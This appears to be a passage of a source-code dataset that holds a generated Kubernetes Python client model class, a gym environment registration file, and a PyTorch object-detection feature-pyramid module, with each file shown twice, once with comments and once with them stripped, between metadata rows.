        Gets the api_version of this V1StorageClassList.
        APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources

        :return: The api_version of this V1StorageClassList.
        :rtype: str
        """
        return self._api_version

    @api_version.setter
    def api_version(self, api_version):
        """
        Sets the api_version of this V1StorageClassList.

        :param api_version: The api_version of this V1StorageClassList.
        :type: str
        """
        self._api_version = api_version

    @property
    def items(self):
        """
        Gets the items of this V1StorageClassList.
        Items is the list of StorageClasses

        :return: The items of this V1StorageClassList.
        :rtype: list[V1StorageClass]
        """
        return self._items

    @items.setter
    def items(self, items):
        """
        Sets the items of this V1StorageClassList.
        Items is the list of StorageClasses

        :param items: The items of this V1StorageClassList.
        :type: list[V1StorageClass]
        :raises ValueError: if `items` is None.
        """
        if items is None:
            raise ValueError("Invalid value for `items`, must not be `None`")
        self._items = items

    @property
    def kind(self):
        """
        Gets the kind of this V1StorageClassList.
        Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds

        :return: The kind of this V1StorageClassList.
        :rtype: str
        """
        return self._kind

    @kind.setter
    def kind(self, kind):
        """
        Sets the kind of this V1StorageClassList.

        :param kind: The kind of this V1StorageClassList.
        :type: str
        """
        self._kind = kind

    @property
    def metadata(self):
        """
        Gets the metadata of this V1StorageClassList.
        Standard list metadata More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata

        :return: The metadata of this V1StorageClassList.
        :rtype: V1ListMeta
        """
        return self._metadata

    @metadata.setter
    def metadata(self, metadata):
        """
        Sets the metadata of this V1StorageClassList.

        :param metadata: The metadata of this V1StorageClassList.
        :type: V1ListMeta
        """
        self._metadata = metadata

    def to_dict(self):
        """
        Returns the model properties as a dict, recursing into nested
        models (anything exposing ``to_dict``) inside lists and dicts.
        """
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [x.to_dict() if hasattr(x, "to_dict") else x
                                for x in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {k: v.to_dict() if hasattr(v, "to_dict") else v
                                for k, v in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, V1StorageClassList):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| 31.834906 | 282 | 0.588532 |
from pprint import pformat
from six import iteritems
import re
class V1StorageClassList(object):
swagger_types = {
'api_version': 'str',
'items': 'list[V1StorageClass]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
return self._api_version
@api_version.setter
def api_version(self, api_version):
self._api_version = api_version
@property
def items(self):
return self._items
@items.setter
def items(self, items):
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
return self._kind
@kind.setter
def kind(self, kind):
self._kind = kind
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, metadata):
self._metadata = metadata
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, V1StorageClassList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f7326c132616d2be4a3970c75e1ba25cc38dc29b | 980 | py | Python | baselines/ppo1/test_env/__init__.py | ByzanTine/baselines | 69432726b689c555cdf118ad0dcf9665abbc4b9d | [
"MIT"
] | null | null | null | baselines/ppo1/test_env/__init__.py | ByzanTine/baselines | 69432726b689c555cdf118ad0dcf9665abbc4b9d | [
"MIT"
] | null | null | null | baselines/ppo1/test_env/__init__.py | ByzanTine/baselines | 69432726b689c555cdf118ad0dcf9665abbc4b9d | [
"MIT"
] | null | null | null | from gym.envs.registration import register
import gym
from test_env.envs import *
# Deterministic four-rooms gridworld on a 9x9 map.
register(
    id='Fourrooms-v1',
    entry_point='test_env.envs.fourrooms:Fourrooms',
    kwargs={
        'map_name': '9x9',
    })

# Stochastic variant of the four-rooms gridworld.
register(
    id='Fourroomssto-v1',
    entry_point='test_env.envs.fourroom_sto:Fourroomssto',
)

# Gridworld where the agent must pick up a key before opening a door.
register(
    id='KeyDoor-v1',
    entry_point='test_env.envs.key_door:KeyDoor',
)

# Multi-task cart-pole variants; MultipleCartPoleEnv defaults to 2 tasks
# unless `num_tasks` is overridden below. Episode limit and reward
# threshold mirror gym's classic CartPole-v0 settings.
register(
    id='DoubleCartPole-v1',
    entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
    max_episode_steps=200,
    reward_threshold=195.0,
)

# Same environment with 4 parallel cart-pole tasks.
register(
    id='QuadCartPole-v1',
    kwargs={
        'num_tasks': 4,
    },
    entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
    max_episode_steps=200,
    reward_threshold=195.0,
)

# Same environment with 16 parallel cart-pole tasks.
register(
    id='16CartPole-v1',
    kwargs={
        'num_tasks': 16,
    },
    entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
    max_episode_steps=200,
    reward_threshold=195.0,
)
| 20 | 69 | 0.687755 | from gym.envs.registration import register
import gym
from test_env.envs import *
register(
id='Fourrooms-v1',
entry_point='test_env.envs.fourrooms:Fourrooms',
kwargs={
'map_name': '9x9',
})
register(
id='Fourroomssto-v1',
entry_point='test_env.envs.fourroom_sto:Fourroomssto',
)
register(
id='KeyDoor-v1',
entry_point='test_env.envs.key_door:KeyDoor',
)
register(
id='DoubleCartPole-v1',
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='QuadCartPole-v1',
kwargs={
'num_tasks': 4,
},
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='16CartPole-v1',
kwargs={
'num_tasks': 16,
},
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
| true | true |
f7326c428c5b6a9d336ebdb571cfc85e2104fd66 | 14,664 | py | Python | horch/legacy/models/detection/enhance.py | sbl1996/pytorch-hrvvi-ext | f19abcbedd844a700b2e2596dd817ea80cbb6287 | [
"MIT"
] | 17 | 2019-05-14T10:47:25.000Z | 2021-06-09T05:39:47.000Z | horch/legacy/models/detection/enhance.py | sbl1996/pytorch-hrvvi-ext | f19abcbedd844a700b2e2596dd817ea80cbb6287 | [
"MIT"
] | null | null | null | horch/legacy/models/detection/enhance.py | sbl1996/pytorch-hrvvi-ext | f19abcbedd844a700b2e2596dd817ea80cbb6287 | [
"MIT"
] | 5 | 2019-08-08T07:04:38.000Z | 2020-07-04T08:58:32.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from horch.common import tuplify
from horch.models.block import mb_conv_block, MBConv
from horch.models.detection.nasfpn import ReLUConvBN
from horch.models.modules import upsample_add, Conv2d, Sequential, Pool2d, upsample_concat
from horch.models.detection.nasfpn import NASFPN
from horch.models.utils import remove_stride_padding
class TopDown(nn.Module):
    """Top-down FPN merge step.

    Projects the backbone feature `c` with a 1x1 lateral conv, combines it
    with the upsampled coarser pyramid feature `p` (sum or channel concat),
    and smooths the result with a conv.
    """

    def __init__(self, in_channels, f_channels, lite=False, aggregate='add'):
        super().__init__()
        self.aggregate = aggregate
        # 1x1 lateral projection to the pyramid width.
        self.lat = Conv2d(
            in_channels, f_channels, kernel_size=1,
            norm='default')
        # Concatenation doubles the channels entering the smoothing conv.
        if aggregate == 'cat':
            conv_in = f_channels * 2
        else:
            conv_in = f_channels
        # Post-merge smoothing; the lite variant uses a 5x5 depthwise-separable conv.
        self.conv = Conv2d(
            conv_in, f_channels, kernel_size=5 if lite else 3,
            norm='default', act='default', depthwise_separable=lite)

    def forward(self, c, p):
        lateral = self.lat(c)
        merge = upsample_concat if self.aggregate == 'cat' else upsample_add
        return self.conv(merge(p, lateral))
class DeconvTopDown(nn.Module):
    # Top-down merge step that upsamples the coarser feature with a learned
    # transposed conv instead of interpolation (compare `TopDown`).
    def __init__(self, in_channels1, in_channels2, f_channels, lite=False, aggregate='add'):
        """
        Args:
            in_channels1: channels of the lateral (finer) feature `c`.
            in_channels2: channels of the coarser pyramid feature `p`.
            f_channels: output channels of the merged feature.
            lite: use depthwise-separable convs (and a 5x5 smoothing kernel).
            aggregate: 'add' to sum lateral and upsampled features,
                'cat' to concatenate them along the channel dim.
        """
        super().__init__()
        self.aggregate = aggregate
        # 1x1 lateral projection of the finer feature.
        self.lat = Conv2d(
            in_channels1, f_channels, kernel_size=1,
            norm='default')
        # Learned 2x upsampling of the coarser feature.
        self.deconv = Conv2d(in_channels2, f_channels, kernel_size=4, stride=2,
                             norm='default', depthwise_separable=lite, transposed=True)
        # 'cat' doubles the channels entering the smoothing conv.
        channels = f_channels * 2 if aggregate == 'cat' else f_channels
        self.conv = Conv2d(
            channels, f_channels, kernel_size=5 if lite else 3,
            norm='default', act='default', depthwise_separable=lite)
    def forward(self, c, p):
        if self.aggregate == 'cat':
            p = torch.cat([self.lat(c), self.deconv(p)], dim=1)
        else:
            p = self.lat(c) + self.deconv(p)
        p = self.conv(p)
        return p
class FPNExtraLayers(nn.Module):
    # Appends extra coarser pyramid levels (e.g. P6, P7) on top of the last
    # FPN output via repeated stride-2 downsampling.
    def __init__(self, in_channels, extra_layers=(6, 7), f_channels=None, downsample='conv', lite=False):
        """
        Args:
            in_channels: channels of the incoming feature.
            extra_layers: level indices to add; only their count is used here.
            f_channels: output channels when `downsample` is 'conv'.
                NOTE(review): no default is substituted when None — 'conv'
                mode requires callers to pass it; confirm call sites.
            downsample: 'conv' | 'maxpool' | 'avgpool'.
            lite: use the lite variant of ReLUConvBN.
        """
        super().__init__()
        self.extra_layers = nn.ModuleList([])
        for _ in extra_layers:
            if downsample == 'conv':
                l = ReLUConvBN(in_channels, f_channels, stride=2, lite=lite)
            elif downsample == 'maxpool':
                l = Pool2d('max', kernel_size=1, stride=2)
            elif downsample == 'avgpool':
                l = Pool2d('avg', kernel_size=1, stride=2)
            else:
                raise ValueError("%s as downsampling is invalid." % downsample)
            # NOTE(review): with pooling the channel count is actually
            # unchanged; this bookkeeping only matters for the 'conv' branch.
            in_channels = f_channels
            self.extra_layers.append(l)
    def forward(self, p):
        # Returns one feature per added level, ordered finest to coarsest.
        ps = []
        for l in self.extra_layers:
            p = l(p)
            ps.append(p)
        return tuple(ps)
class BasicBlock(nn.Sequential):
    """Extra-layer block: a 1x1 channel-reduction conv followed by a
    stride-2 3x3 conv that halves the spatial resolution."""

    def __init__(self, in_channels, out_channels):
        super().__init__()
        mid_channels = out_channels // 2
        self.conv1 = Conv2d(in_channels, mid_channels, kernel_size=1,
                            norm='default', act='default')
        self.conv2 = Conv2d(mid_channels, out_channels, kernel_size=3,
                            stride=2, norm='default', act='default')
class ExtraLayers(nn.Module):
    # Generic SSD-style extra feature layers appended after the backbone;
    # each block downsamples unless its stride/padding is stripped below.
    def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=0, block=BasicBlock, **kwargs):
        """
        Args:
            in_channels_list: channels of the incoming backbone features.
            num_extra_layers: number of extra blocks to append.
            f_channels_list: output channels per extra block (scalar is
                broadcast to `num_extra_layers` entries via `tuplify`).
            no_padding: negative index; stride/padding are removed from the
                trailing `-no_padding` blocks (0 means leave all unchanged).
            block: block constructor `(in_channels, out_channels, **kwargs)`.
        """
        super().__init__()
        f_channels_list = tuplify(f_channels_list, num_extra_layers)
        in_channels_list = list(in_channels_list)
        self.extra_layers = nn.ModuleList([])
        for f_channels in f_channels_list:
            l = block(in_channels_list[-1], f_channels, **kwargs)
            self.extra_layers.append(l)
            in_channels_list.append(f_channels)
        # range(no_padding, 0) walks the trailing blocks when no_padding < 0.
        for i in range(no_padding, 0):
            remove_stride_padding(self.extra_layers[i])
        # Channels of the backbone inputs followed by every extra layer.
        self.out_channels = in_channels_list
    def forward(self, *cs):
        # Pass the inputs through and append each extra layer's output.
        ps = list(cs)
        for l in self.extra_layers:
            ps.append(l(ps[-1]))
        return tuple(ps)
class SSDExtraLayers(ExtraLayers):
    """ExtraLayers preset for SSD: plain `BasicBlock` convs, with the last
    block's stride/padding stripped (``no_padding=-1``)."""

    def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1):
        super().__init__(
            in_channels_list,
            num_extra_layers=num_extra_layers,
            f_channels_list=f_channels_list,
            no_padding=no_padding,
            block=BasicBlock,
        )
class SSDLiteExtraLayers(ExtraLayers):
    """ExtraLayers preset for SSDLite: inverted-residual (MBConv) blocks
    with expand ratio 4, last block's stride/padding stripped."""

    def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1, kernel_size=3):
        super().__init__(
            in_channels_list,
            num_extra_layers=num_extra_layers,
            f_channels_list=f_channels_list,
            no_padding=no_padding,
            block=mb_conv_block,
            expand_ratio=4,
            kernel_size=kernel_size,
        )
class FPN(nn.Module):
    r"""
    Feature Pyramid Network which enhance features of different levels.

    Parameters
    ----------
    in_channels_list : sequence of ints
        Number of input channels of every level, e.g., ``(256,512,1024)``
    f_channels : int
        Number of output channels.
    extra_layers : tuple of ints
        Extra layers to add, e.g., ``(6, 7)``
    downsample : str
        How extra layers downsample: ``conv``, ``maxpool`` or ``avgpool``.
        Default: ``conv``
    lite : bool
        Whether to replace conv3x3 with depthwise seperable conv.
        Default: False
    upsample : str
        Use bilinear upsampling when `interpolate` and ConvTransposed when `deconv`
        Default: `interpolate`
    aggregate : str
        Merge lateral and top-down features by ``add`` or ``cat``.
        Default: ``add``
    """
    def __init__(self, in_channels_list, f_channels=256, extra_layers=(), downsample='conv', lite=False,
                 upsample='interpolate', aggregate='add'):
        super().__init__()
        # 1x1 lateral conv for the coarsest backbone level (the top of the pyramid).
        self.lat = Conv2d(in_channels_list[-1], f_channels, kernel_size=1, norm='default')
        self.extra_layers = extra_layers
        if extra_layers:
            self.extras = FPNExtraLayers(f_channels, extra_layers, f_channels, downsample=downsample, lite=lite)
        # One top-down merge block per remaining (finer) backbone level.
        if upsample == 'deconv':
            self.topdowns = nn.ModuleList([
                DeconvTopDown(c, f_channels, f_channels, lite=lite, aggregate=aggregate)
                for c in in_channels_list[:-1]
            ])
        else:
            self.topdowns = nn.ModuleList([
                TopDown(c, f_channels, lite=lite, aggregate=aggregate)
                for c in in_channels_list[:-1]
            ])
        # All output levels share the same channel width.
        self.out_channels = [f_channels] * (len(in_channels_list) + len(extra_layers))
    def forward(self, *cs):
        # Coarsest level: lateral projection only.
        p = self.lat(cs[-1])
        ps = (p,)
        if self.extra_layers:
            ps = ps + self.extras(p)
        # Walk down the pyramid, merging each finer backbone feature and
        # prepending so the tuple stays ordered finest -> coarsest.
        for c, topdown in zip(reversed(cs[:-1]), reversed(self.topdowns)):
            p = topdown(c, ps[0])
            ps = (p,) + ps
        return ps
class BottomUp(nn.Module):
    """Bottom-up merge step: downsample the finer aggregated feature `n`,
    add the same-level pyramid feature `p`, then smooth with a conv."""

    def __init__(self, f_channels, lite=False):
        super().__init__()
        # Stride-2 conv bringing the finer level down to this resolution.
        self.down = Conv2d(
            f_channels, f_channels, kernel_size=3, stride=2,
            norm='default', act='default', depthwise_separable=lite)
        # Post-merge smoothing conv.
        self.conv = Conv2d(
            f_channels, f_channels, kernel_size=3,
            norm='default', act='default', depthwise_separable=lite)

    def forward(self, p, n):
        merged = p + self.down(n)
        return self.conv(merged)
class FPN2(nn.Module):
    r"""
    Bottom-up path augmentation: starting from the finest level, each
    coarser level is merged with the downsampled running feature.

    Parameters
    ----------
    in_channels_list : sequence of ints
        Number of input channels of every level; all entries must equal
        `f_channels`.
    f_channels : int
        Number of output channels.
    """

    def __init__(self, in_channels_list, f_channels, lite=False):
        super().__init__()
        assert len(set(in_channels_list)) == 1, "Input channels of every level must be the same"
        assert in_channels_list[0] == f_channels, "Input channels must be the same as `f_channels`"
        num_merges = len(in_channels_list) - 1
        self.bottomups = nn.ModuleList(
            [BottomUp(f_channels, lite=lite) for _ in range(num_merges)]
        )
        self.out_channels = [f_channels] * len(in_channels_list)

    def forward(self, *ps):
        outs = [ps[0]]
        for level, block in zip(ps[1:], self.bottomups):
            outs.append(block(level, outs[-1]))
        return tuple(outs)
class ContextEnhance(nn.Module):
    # Fuses all pyramid levels plus a global-pooled context vector into a
    # single feature at the finest level's resolution.
    def __init__(self, in_channels, out_channels):
        """
        Args:
            in_channels: sequence of channel counts, one per input level
                (finest first).
            out_channels: channels of the fused output feature.
        """
        super().__init__()
        # One 1x1 lateral conv per input level.
        self.lats = nn.ModuleList([
            Conv2d(c, out_channels, kernel_size=1, norm='default')
            for c in in_channels
        ])
        # Extra lateral for the globally pooled coarsest feature.
        self.lat_glb = Conv2d(in_channels[-1], out_channels, kernel_size=1,
                              norm='default')
    def forward(self, *cs):
        # Target spatial size is that of the finest level.
        size = cs[0].size()[2:4]
        p = self.lats[0](cs[0])
        # Upsample every coarser level to the target size and accumulate.
        for c, lat in zip(cs[1:], self.lats[1:]):
            p += F.interpolate(lat(c), size=size, mode='bilinear', align_corners=False)
        # Global context: 1x1 pooled coarsest feature broadcast-added.
        c_glb = F.adaptive_avg_pool2d(cs[-1], 1)
        p_glb = self.lat_glb(c_glb)
        p += p_glb
        return p
def stacked_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
    r"""
    Stacked FPN with alternant top down block and bottom up block.

    Parameters
    ----------
    num_stacked : int
        Number of stacked fpns.
    in_channels_list : sequence of ints
        Number of input channels of every level, e.g., ``(128,256,512)``
    extra_layers : tuple of ints
        Extra layers to add, e.g., ``(6, 7)``
    f_channels : int
        Number of feature (output) channels.
        Default: 256
    lite : bool
        Whether to replace conv3x3 with depthwise seperable conv.
        Default: False
    upsample : str
        Use bilinear upsampling if `interpolate` and ConvTransposed if `deconv`
        Default: `interpolate`
    """
    assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
    # First stage maps backbone channels to f_channels and adds extra levels;
    # subsequent stages alternate bottom-up (FPN2, odd i) and top-down (FPN, even i).
    layers = [FPN(in_channels_list, f_channels, extra_layers, lite=lite, upsample=upsample)]
    for i in range(1, num_stacked):
        if i % 2 == 0:
            layers.append(FPN(layers[-1].out_channels, f_channels, lite=lite, upsample=upsample))
        else:
            layers.append(FPN2(layers[-1].out_channels, f_channels, lite=lite))
    m = Sequential(*layers)
    # Expose the final stage's per-level channels on the container.
    m.out_channels = m[-1].out_channels
    return m
def stacked_nas_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
    r"""
    Stacked FPN whose first stage is a regular FPN (with maxpool extra
    layers) followed by ``num_stacked - 1`` NAS-FPN stages.

    Parameters
    ----------
    num_stacked : int
        Number of stacked fpns.
    in_channels_list : sequence of ints
        Number of input channels of every level, e.g., ``(128,256,512)``
    extra_layers : tuple of ints
        Extra layers to add, e.g., ``(6, 7)``
    f_channels : int
        Number of feature (output) channels.
        Default: 256
    lite : bool
        Whether to replace conv3x3 with depthwise seperable conv.
        Default: False
    upsample : str
        Use bilinear upsampling if `interpolate` and ConvTransposed if `deconv`
        Default: `interpolate`
    """
    assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
    # First stage normalizes all levels to f_channels so NASFPN stages can
    # operate on a uniform-width pyramid.
    layers = [FPN(in_channels_list, f_channels, extra_layers, downsample='maxpool', lite=lite, upsample=upsample)]
    for i in range(1, num_stacked):
        layers.append(NASFPN(f_channels))
    m = Sequential(*layers)
    # NOTE(review): assumes NASFPN exposes `out_channels` — confirm.
    m.out_channels = m[-1].out_channels
    return m
class IDA(nn.Module):
    """Iterative deep aggregation: merges each adjacent pair of levels with
    a `DeconvTopDown` block, then recurses on the merged pyramid until a
    single feature map of `f_channels` channels remains.
    """

    def __init__(self, in_channels_list, f_channels, lite=False):
        super().__init__()
        self.num_levels = len(in_channels_list)
        self.topdowns = nn.ModuleList([
            DeconvTopDown(in_channels_list[i], in_channels_list[i + 1], f_channels, lite=lite)
            for i in range(self.num_levels - 1)
        ])
        if self.num_levels > 2:
            # Bug fix: propagate `lite` to the recursive stage. It was
            # previously dropped, so deeper stages silently built full
            # (non-lite) convs; the sibling IDA2 propagates it correctly.
            self.deep = IDA([f_channels] * (self.num_levels - 1), f_channels, lite=lite)

    def forward(self, *xs):
        # Merge every adjacent pair: level i with the coarser level i+1.
        merged = [l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)]
        if self.num_levels > 2:
            return self.deep(*merged)
        return merged[0]
class IDA2(nn.Module):
    # Iterative deep aggregation variant that keeps per-level channel
    # counts: each merge outputs the coarser input's channel width.
    def __init__(self, in_channels, lite=False):
        """
        Args:
            in_channels: sequence of channel counts, one per input level
                (finest first).
            lite: use depthwise-separable convs in the merge blocks.
        """
        super().__init__()
        self.num_levels = len(in_channels)
        self.topdowns = nn.ModuleList([
            DeconvTopDown(in_channels[i], in_channels[i + 1], in_channels[i + 1], lite=lite)
            for i in range(self.num_levels - 1)
        ])
        if self.num_levels > 2:
            # Recurse on the merged pyramid (one level fewer each stage).
            self.deep = IDA2(in_channels[1:], lite=lite)
    def forward(self, *xs):
        # Merge each adjacent pair, then recurse until one map remains.
        xs = [
            l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)
        ]
        if self.num_levels > 2:
            return self.deep(*xs)
        else:
            return xs[0]
class YOLOFPN(nn.Module):
    # YOLOv3-style neck: per level (processed coarsest-first) two MBConv
    # blocks produce an output feature, while a reduced (f_channels // 4)
    # intermediate is upsampled and concatenated into the next finer level.
    def __init__(self, in_channels_list, f_channels_list=(256, 512, 1024), kernel_size=5):
        """
        Args:
            in_channels_list: backbone channels per level, finest first.
            f_channels_list: output channels per level, finest first.
            kernel_size: depthwise kernel size of the MBConv blocks.
        """
        super().__init__()
        assert len(in_channels_list) == len(f_channels_list)
        num_levels = len(in_channels_list)
        self.convs = nn.ModuleList([])
        self.lats = nn.ModuleList([])
        self.outs = nn.ModuleList([])
        for i in range(num_levels):
            # Negative indexing walks the lists coarsest -> finest.
            f_channels = f_channels_list[-(i+1)]
            in_channels = in_channels_list[-(i+1)]
            if i == 0:
                self.convs.append(nn.Sequential(
                    MBConv(in_channels, in_channels, f_channels // 4, kernel_size=kernel_size),
                    MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
                ))
            else:
                # 1x1 conv reducing the coarser level's intermediate before
                # it is upsampled and concatenated with this level.
                self.lats.append(Conv2d(f_channels_list[-i] // 4, f_channels // 4, kernel_size=1,
                                        norm='default'))
                self.convs.append(nn.Sequential(
                    MBConv(in_channels + f_channels // 4, in_channels + f_channels // 4, f_channels // 4, kernel_size=kernel_size),
                    MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
                ))
            # Head producing this level's final output feature.
            self.outs.append(MBConv(f_channels // 4, f_channels, None, kernel_size=kernel_size))
        self.out_channels = tuple(f_channels_list)
    def forward(self, *cs):
        ps = []
        # Start at the coarsest backbone level.
        p1 = self.convs[0](cs[-1])
        p2 = self.outs[0](p1)
        ps.append(p2)
        for lat, conv, out, c in zip(self.lats, self.convs[1:], self.outs[1:], reversed(cs[:-1])):
            # Fuse the reduced, upsampled coarser intermediate with this level.
            c = upsample_concat(lat(p1), c)
            p1 = conv(c)
            p2 = out(p1)
            ps.append(p2)
        # Reverse so outputs are ordered finest -> coarsest like the inputs.
        return tuple(reversed(ps))
| 36.477612 | 136 | 0.598472 | import torch
import torch.nn as nn
import torch.nn.functional as F
from horch.common import tuplify
from horch.models.block import mb_conv_block, MBConv
from horch.models.detection.nasfpn import ReLUConvBN
from horch.models.modules import upsample_add, Conv2d, Sequential, Pool2d, upsample_concat
from horch.models.detection.nasfpn import NASFPN
from horch.models.utils import remove_stride_padding
class TopDown(nn.Module):
def __init__(self, in_channels, f_channels, lite=False, aggregate='add'):
super().__init__()
self.aggregate = aggregate
self.lat = Conv2d(
in_channels, f_channels, kernel_size=1,
norm='default')
channels = f_channels * 2 if aggregate == 'cat' else f_channels
self.conv = Conv2d(
channels, f_channels, kernel_size=5 if lite else 3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, c, p):
if self.aggregate == 'cat':
p = upsample_concat(p, self.lat(c))
else:
p = upsample_add(p, self.lat(c))
p = self.conv(p)
return p
class DeconvTopDown(nn.Module):
def __init__(self, in_channels1, in_channels2, f_channels, lite=False, aggregate='add'):
super().__init__()
self.aggregate = aggregate
self.lat = Conv2d(
in_channels1, f_channels, kernel_size=1,
norm='default')
self.deconv = Conv2d(in_channels2, f_channels, kernel_size=4, stride=2,
norm='default', depthwise_separable=lite, transposed=True)
channels = f_channels * 2 if aggregate == 'cat' else f_channels
self.conv = Conv2d(
channels, f_channels, kernel_size=5 if lite else 3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, c, p):
if self.aggregate == 'cat':
p = torch.cat([self.lat(c), self.deconv(p)], dim=1)
else:
p = self.lat(c) + self.deconv(p)
p = self.conv(p)
return p
class FPNExtraLayers(nn.Module):
def __init__(self, in_channels, extra_layers=(6, 7), f_channels=None, downsample='conv', lite=False):
super().__init__()
self.extra_layers = nn.ModuleList([])
for _ in extra_layers:
if downsample == 'conv':
l = ReLUConvBN(in_channels, f_channels, stride=2, lite=lite)
elif downsample == 'maxpool':
l = Pool2d('max', kernel_size=1, stride=2)
elif downsample == 'avgpool':
l = Pool2d('avg', kernel_size=1, stride=2)
else:
raise ValueError("%s as downsampling is invalid." % downsample)
in_channels = f_channels
self.extra_layers.append(l)
def forward(self, p):
ps = []
for l in self.extra_layers:
p = l(p)
ps.append(p)
return tuple(ps)
class BasicBlock(nn.Sequential):
def __init__(self, in_channels, out_channels):
super().__init__()
self.conv1 = Conv2d(in_channels, out_channels // 2, kernel_size=1,
norm='default', act='default')
self.conv2 = Conv2d(out_channels // 2, out_channels, kernel_size=3, stride=2,
norm='default', act='default')
class ExtraLayers(nn.Module):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=0, block=BasicBlock, **kwargs):
super().__init__()
f_channels_list = tuplify(f_channels_list, num_extra_layers)
in_channels_list = list(in_channels_list)
self.extra_layers = nn.ModuleList([])
for f_channels in f_channels_list:
l = block(in_channels_list[-1], f_channels, **kwargs)
self.extra_layers.append(l)
in_channels_list.append(f_channels)
for i in range(no_padding, 0):
remove_stride_padding(self.extra_layers[i])
self.out_channels = in_channels_list
def forward(self, *cs):
ps = list(cs)
for l in self.extra_layers:
ps.append(l(ps[-1]))
return tuple(ps)
class SSDExtraLayers(ExtraLayers):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1):
super().__init__(
in_channels_list,
num_extra_layers,
f_channels_list,
no_padding,
BasicBlock
)
class SSDLiteExtraLayers(ExtraLayers):
def __init__(self, in_channels_list, num_extra_layers=3, f_channels_list=(512, 256, 256), no_padding=-1, kernel_size=3):
super().__init__(
in_channels_list,
num_extra_layers,
f_channels_list,
no_padding,
mb_conv_block,
expand_ratio=4,
kernel_size=kernel_size
)
class FPN(nn.Module):
def __init__(self, in_channels_list, f_channels=256, extra_layers=(), downsample='conv', lite=False,
upsample='interpolate', aggregate='add'):
super().__init__()
self.lat = Conv2d(in_channels_list[-1], f_channels, kernel_size=1, norm='default')
self.extra_layers = extra_layers
if extra_layers:
self.extras = FPNExtraLayers(f_channels, extra_layers, f_channels, downsample=downsample, lite=lite)
if upsample == 'deconv':
self.topdowns = nn.ModuleList([
DeconvTopDown(c, f_channels, f_channels, lite=lite, aggregate=aggregate)
for c in in_channels_list[:-1]
])
else:
self.topdowns = nn.ModuleList([
TopDown(c, f_channels, lite=lite, aggregate=aggregate)
for c in in_channels_list[:-1]
])
self.out_channels = [f_channels] * (len(in_channels_list) + len(extra_layers))
def forward(self, *cs):
p = self.lat(cs[-1])
ps = (p,)
if self.extra_layers:
ps = ps + self.extras(p)
for c, topdown in zip(reversed(cs[:-1]), reversed(self.topdowns)):
p = topdown(c, ps[0])
ps = (p,) + ps
return ps
class BottomUp(nn.Module):
def __init__(self, f_channels, lite=False):
super().__init__()
self.down = Conv2d(
f_channels, f_channels, kernel_size=3, stride=2,
norm='default', act='default', depthwise_separable=lite)
self.conv = Conv2d(
f_channels, f_channels, kernel_size=3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, p, n):
n = p + self.down(n)
n = self.conv(n)
return n
class FPN2(nn.Module):
def __init__(self, in_channels_list, f_channels, lite=False):
super().__init__()
